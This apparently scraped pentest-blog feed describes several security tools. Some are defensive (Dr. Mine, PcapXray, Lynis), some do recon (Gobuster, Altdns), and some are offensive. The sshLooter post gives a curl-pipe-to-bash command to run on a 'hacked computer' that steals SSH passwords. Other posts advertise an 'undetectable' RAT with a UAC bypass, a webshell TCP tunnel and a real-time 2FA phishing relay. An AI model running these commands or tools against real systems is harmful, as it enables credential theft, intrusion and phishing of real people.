Dr. Mine – Tool To Aid Automatic Detection Of In-Browser Cryptojacking

Dr. Mine is a node script written to aid automatic detection of in-browser cryptojacking. The most accurate way to detect things that happen in a browser is via browser itself. Thus, Dr. Mine uses puppeteer to automate browser thingy and catches any requests to online cryptominers. When a request to any online cryptominers is detected, it flags the corresponding URL and cryptominer being in use. Therefore, however the code is written or obfuscated, Dr. Mine will catch it (as long as the miners are in the list). The list of online cryptominers are fetched from CoinBlockerLists. The result is also saved on file for later use.Can also process single URL passed directly via command lineAll links found on the first (requested) page are also processed, if same-originAll configurable options are stored in config.js allowing easier modificationsTo reduce extra bandwidth and processing, all requests to resources like fonts, images, media, stylesheets are abortedPre-requisites & InstallationThe following 3 lines of commands should set everything up and running on Arch distros;pacman -S nodejs npmgit clone https://github.com/1lastBr3ath/drmine.git && cd drminenpm i –save puppeteerPlease make sure your version of node is 7.6.0 or greater. For any installation assistance or instructions on specific distros, please refer to respective documents;https://nodejs.org/en/download/package-manager/https://docs.npmjs.com/getting-started/installing-nodehttps://github.com/GoogleChrome/puppeteer#installationUsageDr. Mine accepts either a URL or a file which is expected to contain valid URLs. Usage is as simple as;node drmine.js list.txtA sample list.txt looks like;http://cm2.pwhttp://cm2.pw/xmr/https://example.com/An example of passing URL directly via command line;node drmine.js http://cm2.pw/xmr/Download Dr. Mine

Link: http://feedproxy.google.com/~r/PentestTools/~3/PI7H4mRFqgY/dr-mine-tool-to-aid-automatic-detection.html

Gobuster – Directory/File & DNS Busting Tool Written In Go

Gobuster is a tool used to brute-force:URIs (directories and files) in web sites.DNS subdomains (with wildcard support).Oh dear God.. WHY!?Because I wanted:… something that didn’t have a fat Java GUI (console FTW)…. to build something that just worked on the command line…. something that did not do recursive brute force…. something that allowed me to brute force folders and multiple extensions at once…. something that compiled to native on multiple platforms…. something that was faster than an interpreted script (such as Python)…. something that didn’t require a runtime…. use something that was good with concurrency (hence Go)…. to build something in Go that wasn’t totally useless.Common Command line options-fw – Force processing of a domain with wildcard results.-m – which mode to use, either dir or dns (default: dir)-q – disables banner/underline output.-t <threads> – number of threads to run (default: 10).-u <url/domain> – full URL (including scheme), or base domain name.-v – verbose output (show all results).-w <wordlist> – path to the wordlist used for brute forcing.Command line options for dns mode-cn – show CNAME records (cannot be used with ‘-i’ option).-i – show all IP addresses for the result.Command line options for dir mode-a <user agent string> – specify a user agent string to send in the request header.-c <http cookies> – use this to specify any cookies that you might need (simulating auth).-e – specify extended mode that renders the full URL.-f – append / for directory brute forces.-k – Skip verification of SSL certificates.-l – show the length of the response.-n – “no status" mode, disables the output of the result’s status code.-o <file> – specify a file name to write the output to.-p <proxy url> – specify a proxy to use for all requests (scheme much match the URL scheme).-r – follow redirects.-s <status codes> – comma-separated set of the list of status codes to be deemed a "positive" (default: 200,204,301,302,307).-x <extensions> – list of extensions to check for, if any.-P <password> – HTTP Authorization password (Basic Auth only, prompted if missing).-U <username> – HTTP Authorization username (Basic Auth only).BuildingSince this tool is written in Go you need install the Go language/compiler/etc. Full details of installation and set up can be found on the Go language website. Once installed you have two options.Compilinggobuster now has external dependencies, and so they need to be pulled in first:gobuster $ go get && go buildThis will create a gobuster binary for you. If you want to install it in the $GOPATH/bin folder you can run:gobuster $ go installRunning as a scriptgobuster$ go run main.go <parameters>Wordlists via STDINWordlists can be piped into gobuster via stdin:hashcat -a 3 –stdout ?l | gobuster -u https://mysite.comNote: If the -w option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate.Examplesdir modeCommand line might look like this:$ gobuster -u https://mysite.com/path/to/folder -c ‘session=123456’ -t 50 -w common-files.txt -x .php,.htmlDefault options looks like this:$ gobuster -u http://buffered.io/ -w words.txtGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dir[+] Url/Domain : http://buffered.io/[+] Threads : 10[+] Wordlist : words.txt[+] Status codes : 200,204,301,302,307=====================================================/index (Status: 200)/posts (Status: 301)/contact (Status: 301)=====================================================Default options with status codes disabled looks like this:$ gobuster -u http://buffered.io/ -w words.txt -nGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dir[+] Url/Domain : http://buffered.io/[+] Threads : 10[+] Wordlist : words.txt[+] Status codes : 200,204,301,302,307[+] No status : true=====================================================/index/posts/contact=====================================================Verbose output looks like this:$ gobuster -u http://buffered.io/ -w words.txt -vGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dir[+] Url/Domain : http://buffered.io/[+] Threads : 10[+] Wordlist : words.txt[+] Status codes : 200,204,301,302,307[+] Verbose : true=====================================================Found : /index (Status: 200)Missed: /derp (Status: 404)Found : /posts (Status: 301)Found : /contact (Status: 301)=====================================================Example showing content length:$ gobuster -u http://buffered.io/ -w words.txt -lGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dir[+] Url/Domain : http://buffered.io/[+] Threads : 10[+] Wordlist : /tmp/words[+] Status codes : 301,302,307,200,204[+] Show length : true=====================================================/contact (Status: 301)/posts (Status: 301)/index (Status: 200) [Size: 61481]=====================================================Quiet output, with status disabled and expanded mode looks like this ("grep mode"):$ gobuster -u http://buffered.io/ -w words.txt -q -n -ehttp://buffered.io/postshttp://buffered.io/contacthttp://buffered.io/indexdns modeCommand line might look like this:$ gobuster -m dns -u mysite.com -t 50 -w common-names.txtNormal sample run goes like this:$ gobuster -m dns -w subdomains.txt -u google.comGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dns[+] Url/Domain : google.com[+] Threads : 10[+] Wordlist : subdomains.txt=====================================================Found: m.google.comFound: admin.google.comFound: mobile.google.comFound: www.google.comFound: search.google.comFound: chrome.google.comFound: ns1.google.comFound: store.google.comFound: wap.google.comFound: support.google.comFound: directory.google.comFound: translate.google.comFound: news.google.comFound: music.google.comFound: mail.google.comFound: blog.google.comFound: cse.google.comFound: local.google.com=====================================================Show IP sample run goes like this:$ gobuster -m dns -w subdomains.txt -u google.com -iGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dns[+] Url/Domain : google.com[+] Threads : 10[+] Wordlist : subdomains.txt[+] Verbose : true=====================================================Found: chrome.google.com [2404:6800:4006:801::200e,]Found: m.google.com [, 2404:6800:4006:801::200b]Found: www.google.com [,,,,, 2404:6800:4006:801::2004]Found: search.google.com [2404:6800:4006:801::200e,]Found: admin.google.com [, 2404:6800:4006:801::200e]Found: store.google.com [, 2404:6800:4006:801::200e]Found: mobile.google.com [, 2404:6800:4006:801::200b]Found: ns1.google.com []Found: directory.google.com [, 2404:6800:4006:801::200e]Found: translate.google.com [, 2404:6800:4006:801::200e]Found: cse.google.com [, 2404:6800:4006:801::200e]Found: local.google.com [2404:6800:4006:801::200e,]Found: music.google.com [2404:6800:4006:801::200e,]Found: wap.google.com [, 2404:6800:4006:801::200e]Found: blog.google.com [, 2404:6800:4006:801::2009]Found: support.google.com [, 2404:6800:4006:801::200e]Found: news.google.com [, 2404:6800:4006:801::200e]Found: mail.google.com [, 2404:6800:4006:801::2005]=====================================================Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain.$ gobuster -m dns -w subdomains.txt -u yp.to -iGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dns[+] Url/Domain : yp.to[+] Threads : 10[+] Wordlist : /tmp/test.txt=====================================================[-] Unable to validate base domain: yp.toFound: cr.yp.to [,]=====================================================Wildcard DNS is also detected properly:$ gobuster -w subdomainsbig.txt -u doesntexist.com -m dnsGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dns[+] Url/Domain : doesntexist.com[+] Threads : 10[+] Wordlist : subdomainsbig.txt=====================================================[-] Wildcard DNS found. IP address(es):[-] To force processing of Wildcard DNS, specify the ‘-fw’ switch.=====================================================If the user wants to force processing of a domain that has wildcard entries, use -fw:$ gobuster -w subdomainsbig.txt -u doesntexist.com -m dns -fwGobuster v1.4.1 OJ Reeves (@TheColonial)=====================================================[+] Mode : dns[+] Url/Domain : doesntexist.com[+] Threads : 10[+] Wordlist : subdomainsbig.txt=====================================================[-] Wildcard DNS found. IP address(es): email.doesntexist.com^C[!] Keyboard interrupt detected, terminating.=====================================================Download Gobuster

Link: http://feedproxy.google.com/~r/PentestTools/~3/buQ2qHF-Row/gobuster-directoryfile-dns-busting-tool.html

Tunna – Set Of Tools Which Will Wrap And Tunnel Any TCP Communication Over HTTP

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.SUMMARYTLDR: Tunnels TCP connections over HTTPIn a fully firewalled (inbound and outbound connections restricted – except the webserver port)The webshell can be used to connect to any service on the remote host. This would be a local connection on a local port at the remote host and should be allowed by the firewall.The webshell will read data from the service port wrap them over HTTP and send it as an HTTP response to the local proxy.The local proxy will unwrap and write the data to it’s local port where the client program would be connected.When the local proxy receives data on the local port, it will send them over to the webshell as an HTTP Post.The webshell will read the data from the HTTP Post and put them on the service portand repeat –^Only the webserver port needs to be open (typically 80/443) The whole communication (Externally) is done over the HTTP protocolUSAGEpython proxy.py -u -l <localport> [options]Options–help, -h show this help message and exit–url=URL, -u URL url of the remote webshell–lport=LOCAL_PORT, -l LOCAL_PORT local listening port–verbose, -v Verbose (outputs packet size)–buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP request size (some webshels have limitations on the size)No SOCKS OptionsOptions are ignored if SOCKS proxy is used–no-socks, -n Do not use Socks Proxy–rport=REMOTE_PORT, -r REMOTE_PORT remote port of service for the webshell to connect to–addr=REMOTE_IP, -a REMOTE_IP address for remote webshell to connect to (default = Proxy OptionsTunnel connection through a local Proxy–up-proxy=UPPROXY, -x UPPROXY Upstream proxy (http://proxyserver.com:3128)–auth, -A Upstream proxy requires authenticationAdvanced Options–ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging thread interval (default = 0.5)–start-ping, -s Start the pinging thread first – some services send data first (eg. SSH)–cookie, -C Request cookies–authentication, -t Basic authenticationSee limitationsexample usage: python proxy.py -u -l 8000 -v# This will start a Local SOCKS Proxy Server at port 80000# This connection will be wrapped over HTTP and unwrapped at the remote serverpython proxy.py -u -l 8000 -x -A -v# This will start a Local SOCKS Proxy Server at port 80000# It will connect through a Local Proxy ( that requires authentication# to the remote Tunna webshellpython proxy.py -u -l 4444 -r 3389 -b 8192 -v –no-socks# This will initiate a connection between the webshell and Remote host RDP (3389) service# The RDP client can connect on localhost port 4444# This connection will be wrapped over HTTPPrerequisitesThe ability to upload a webshell on the remote serverLIMITATIONS / KNOWN BUGS / HACKSThis is a POC code and might cause DoS of the server. All efforts to clean up after execution or on error have been made (no promises)Based on local tests: * JSP buffer needs to be limited (buffer option): 4096 worked in Linux Apache Tomcat 1024 worked in XAMPP Apache Tomcat (slow) * More than that created problems with bytes missing at the remote socket eg: ruby proxy.rb -u -l 4444 -r 3389 -b 1024 -v * Sockets not enabled by default php windows (IIS + PHP) * Return cariages on webshells (outside the code): get sent on responses / get written on local socket –> corrupt the packets * PHP webshell for windows: the loop function DoS’es the remote socket: sleep function added -> works but a bit slow * PHP webshell needs new line characters removed at the end of the file (after “?>") as these will get send in every response and confuse Tunna FILESWebshells: conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)WebServer: webserver.py Tested with Python 2.6.5Proxies: proxy.py Tested with Python 2.6.5Technical DetailsArchitecture descisionsData is sent raw in the HTTP Post Body (no post variable)Instructions / configuration is sent to the webshell as URL parameters (HTTP Get)Data is sent in the HTTP body (HTTP Post)Websockets not used: Not supported by default by most of webserversAsyncronous HTTP responses not really possible Proxy queries the server constantly (default 0.5 seconds)INITIATION PHASE1st packet initiates a session with the webshell – gets a cookie back eg: http://webserver/conn.ext?proxy2nd packet sends connection configuration options to the webshell eg: http://webserver/conn.ext?proxy&port=4444&ip= and port for the webshell to connect toThis is a threaded request: In php this request will go into an infinate loop to keep the webshell socket connection alive In other webshells [OK] is received backTUNNA CLIENTA local socket is going to get created where the client program is going to connect to Once the client is connected the pinging thread is initiated and execution starts. Any data on the socket (from the client) get read and get sent as a HTTP Post request Any data on the webshell socket get sent as a response to the POST requestPINGING THREADBecause HTTP responses cannot be asyncronous. This thread will do HTTP Get requests on the webshell based on an interval (default 0.5 sec) If the webshell has data to send, it will (also) send it as a reply to this request Otherwise it sends an empty responseIn general: Data from the local proxy get send with HTTP Post There are Get requests every 0.5 sec to query the webshell for data If there is data on the webshell side get send over as a response to one of these requestsWEBSHELLThe webshell connects to a socket on the local or a remote host. Any data written on the socket get sent back to the proxy as a reply to a request (POST/GET) Any data received with a post get written to the socket.NOTESAll requests need to have the URL parameter "proxy" set to be handled by the webshell (http://webserver/conn.ext?proxy)AT EXIT / AT ERRORKills all threads and closes local socket Sends proxy&close to webshell: Kills remote threads and closes socketSOCKSThe SOCKS support is an addon module for Tunna. Locally is a seperate thread that handles the connection requests and traffic adds a header that specifies the port and the size of the packet and forwards it to Tunna. Tunna sends it over to the remote webserver, removes the HTTP headers and forwards the packet to the remote SOCKS proxy. The remote SOCKS proxy initiates the connection and mapps the received port to the local port. If the remote SOCKS proxy receives data from the service, it looks at the mapping table and finds the port it needs to respond to, adds the port as a header so the local SOCKS proxy will know where to forward the data. Any traffic from the received port will be forwarded to the local port and vice versa.Download Tunna

Link: http://feedproxy.google.com/~r/PentestTools/~3/p4t5NT8McxM/tunna-set-of-tools-which-will-wrap-and.html

PcapXray – A Network Forensics Tool To visualize a Packet Capture offline as a Network Diagram

PcapXray is a Network Forensics Tool  To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction.PcapXray Design SpecificationGoal:Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.Problem: Investigation of a Pcap file takes a long time given initial glitch to start the investigation Faced by every forensics investigator and anyone who is analyzing the network Location: https://github.com/Srinivas11789/PcapXray Solution: Speed up the investigation processMake a network diagram with the following features from a Pcap file Tool Highlights:Network Diagram – Summary Network Diagram of full networkInformation:Traffic with Server DetailsTor TrafficPossible Malicious trafficData Obtained from Packet in Report – Device/Traffic/PayloadsDevice DetailsTool Image:Components:Network DiagramDevice/Traffic Details and AnalysisMalicious Traffic IdentificationTor TrafficGUI – a gui with options to upload pcap file and display the network diagramPython Libraries Used: – All these libraries are required for functionalityTkinter and TTK – Install from pip or apt-get – Ensure Tkinter and graphviz is installed (Most Linux contain by default) apt install python-tkapt install graphvizAll these are included in the requirements.txt file Scapy – rdpcap to read the packets from the pcap fileIpwhois – to obtain whois information from ipNetaddr – to check ip information typePillow – image processing libraryStem – tor consensus data fetch librarypyGraphviz – plot graphNetworkx – plot graphMatplotlib – plot graphChallenges:Unstability of the TK GUI: Decision on the GUI between Django and TK, settled upon tk for a simple local interface, but the unstability of the tk gui caused a number of problemsGraph Plotting: Plotting a proper network graph which is readable from the data obtained was quite an effort, used different libraries to arrive at one.Performance and Timing: The performance and timing of the total application was a big challenge with different data gathering and output generationKnown Bugs: Memory Hogging Sometimes memory hogging occurs when lower RAM is present in the system as the data stored in the memory from the pcap file is hugeShould be Fixed by moving data into a database than the memory itself Race Condition Due to mainloop of the TK gui, other threads could undergo a race conditionShould be fixed by moving to a better structured TK implementation or Web GUI Tk GUI Unstability: Same reason as above Current Fix in rare occasions: If any of the above issue occurs the progress bar keeps running and no output is generated, a restart of the app would be required. Future:Change the database from JSON to sqlite or prominent database, due to memory hoggingChange fronend to web based such as DjangoMake the application more stableDownload PcapXray

Link: http://feedproxy.google.com/~r/PentestTools/~3/ftcC-0wgqy8/pcapxray-network-forensics-tool-to.html

sshLooter – Script To Steal Passwords From SSH

Script to steal passwords from SSH.Installgit clone https://github.com/mthbernardes/sshLooter.gitcd sshLooterConfigurationEdit the script on install.sh, and add your telegram bot api, and your userid.Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.UsageOn your server execute.python -m SimpleHTTPServerOn the hacked computer execute.curl http://yourserverip:8000/install.sh | bashOriginal script fromChokePointPost about this scriptStealing SSH credentials Another Approach.Download sshLooter

Link: http://feedproxy.google.com/~r/PentestTools/~3/sv_INrpFNtw/sshlooter-script-to-steal-passwords.html

Altdns – Generates permutations, alterations and mutations of subdomains and then resolves them

Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.From these two lists that are provided as input to altdns, the tool then generates a massive output of “altered" or "mutated" potential subdomains that could be present. It saves this output so that it can then be used by your favourite DNS bruteforcing tool.Alternatively, the -r flag can be passed to altdns so that once this output is generated, the tool can then resolve these subdomains (multi-threaded) and save the results to a file.Altdns works best with large datasets. Having an initial dataset of 200 or more subdomains should churn out some valid subdomains via the alterations generated.Installationpip install -r requirements.txtUsage# ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txtsubdomains.txt contains the known subdomains for an organizationdata_output is a file that will contain the massive list of altered and permuted subdomainswords.txt is your list of words that you’d like to permute your current subdomains with (i.e. admin, staging, dev, qa) – one word per linethe -r command resolves each generated, permuted subdomainthe -s command tells altdns where to save the results of the resolved permuted subdomains. results_output.txt will contain the final list of permuted subdomains found that are valid and have a DNS record.the -t command limits how many threads the resolver will use simultaneously-d overrides the system default DNS resolver and will use the specified IP address as the resolving server. Setting this to the authoritative DNS server of the target domain may increase resolution performanceScreenshotsDownload Altdns

Link: http://feedproxy.google.com/~r/PentestTools/~3/WWOWDmD7nVk/altdns-generates-permutations.html

Parat – Python Based Remote Administration Tool (RAT)

Parat is a simple remote administration tool (RAT) written in python.Also you can read wiki!Change log:Compatible with both python 2 and 3 versions(dont forget that may causes some error.so please share us any error(s))Do you want to try?Copy and paste on your terminal:git clone https://github.com/micle-fm/Parat && cd Parat && python main.pyNote: it may need to install python -m easy_install pypiwin32 on some targets.FeaturesFully UnDetectable(FUD)Compatible with Telegram messangerBypass windows User Account Control(UAC)Memory executationNo any requirments to setupTelegramYou can communicate parat using telegram messanger. For this do steps:Open telegram.service file by an editorInsert your bot token on line 15, replaced on YOUR_BOT_TOKENRun telegram.service by typing: python telegram.serviceNow you can use your bot to control parat 🙂 Download Parat

Link: http://feedproxy.google.com/~r/PentestTools/~3/JA8tIb4xMW4/parat-python-based-remote.html

Lynis 2.6.2 – Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.Supported operating systemsThe tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:AIXFreeBSDHP-UXLinuxMac OSNetBSDOpenBSDSolarisand othersIt even runs on systems like the Raspberry Pi and several storage devices!Installation optionalLynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use “./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). How it worksLynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.StepsDetermine operating systemSearch for available tools and utilitiesCheck for Lynis updateRun tests from enabled pluginsRun security tests per categoryReport status of security scanBesides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.Opportunistic ScanningLynis scanning is opportunistic: it uses what it can find.For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.In-depth security scansBy performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!Use casesSince Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:Security auditingCompliance testing (e.g. PCI, HIPAA, SOx)Vulnerability detection and scanningSystem hardeningResources used for testingMany other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.Best practicesCISNISTNSAOpenSCAP dataVendor guides and recommendations (e.g. Debian Gentoo, Red Hat)Lynis PluginsPlugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.ChangelogUpgrade noteChanges:——–* Bugfix for Arch Linux (binary detection)* Textual changes for several tests* Update of tests databaseDownload Lynis 2.6.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/vGkfwda54AA/lynis-262-security-auditing-tool-for.html

ReelPhish – A Real-Time Two-Factor Phishing Tool

ReelPhish simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.This tool has been released along with a FireEye blog post. The blog post can be found at the following link: https://www.fireeye.com/blog/threat-research/2018/02/reelphish-real-time-two-factor-phishing-tool.htmlInstallation Steps The latest release of Python 2.7.x is required. Install Selenium, a required dependency to run the browser drivers.pip install -r requirements.txt Download browser drivers for all web browsers you plan to use. Binaries should be placed in this root directory with the following naming scheme.Internet Explorer: www.seleniumhq.org/download/Download the Internet Explorer Driver Server for 32 bit Windows IE. Unzip the file and rename the binary to: IEDriver.exe.In order for the Internet Explorer Driver to work, be sure protected mode is disabled. On IE11 (64 bit Windows), you must create registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BFCACHE". In this key, create a DWORD value named iexplore.exe and set the value to 0.Further information on Internet Explorer requirements can be found on www.github.com/SeleniumHQ/selenium/wiki/InternetExplorerDriverFirefox: www.github.com/mozilla/geckodriver/releases/Download the latest release of the Firefox GeckoDriver for Windows 32 bit. Unzip the file and rename the binary to: FFDriver.exe.On Linux systems, download the Linux version of Firefox GeckoDriver and rename the binary to: FFDriver.bin . Linux support is experimental.Gecko Driver has special requirements. Copy FFDriver.exe to geckodriver.exe and place it into your PATH variable. Additionally, add firefox.exe to your PATH variable.Chrome: https://chromedriver.storage.googleapis.com/index.html?path=2.35/Download the latest release of the Google Chrome Driver for Windows 32 bit. Unzip the file and rename the binary to: ChromeDriver.exe.On Linux systems, download the Linux version of the Chrome Web Driver and rename the binary to: ChromeDriver.bin . Linux support is experimental.Running ReelPhishReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script.The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received, the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a user’s credentials). Credentials will be submitted by the web browser.The recommended way of handling communication between the phishing site and this script is by using a reverse SSH tunnel. This is why the example PHP phishing site code submits credentials to localhost:2135.ReelPhish ArgumentsYou must specify the browser you will be using with the –browser parameter. Supported browsers include Internet Explorer ("–browser IE"), Firefox ("–browser FF"), and Chrome ("–browser Chrome"). Windows and Linux are both supported. Chrome requires the least amount of setup steps. See above installation instructions for further details.You must specify the URL. The script will navigate to this URL and submit credentials on your behalf.Other optional parameters are available.Set the logging parameter to debug (–logging debug) for verbose event loggingSet the submit parameter (–submit) to customize the element that is "clicked" by the browserSet the override parameter (–override) to ignore missing form elementsSet the numpages parameter (–numpages) to increase the number of authentication pages (see below section)Multi Page Authentication SupportReelPhish supports multiple authentication pages. For example, in some cases a two factor authentication code may be requested on a second page. To implement this feature, be sure that –numpages is set to the number of authentication pages. Also be sure that the session ID is properly tracked on your phishing site. The session ID is used to track users as they proceed through each step of authentication.In some cases, you may need to scrape specific content (such as a challenge code) off of a particular authentication page. Example commented out code is provided in ReelPhish.py to perform a scraping operation.Download ReelPhish

Link: http://feedproxy.google.com/~r/PentestTools/~3/pqO4QKRqGRw/reelphish-real-time-two-factor-phishing.html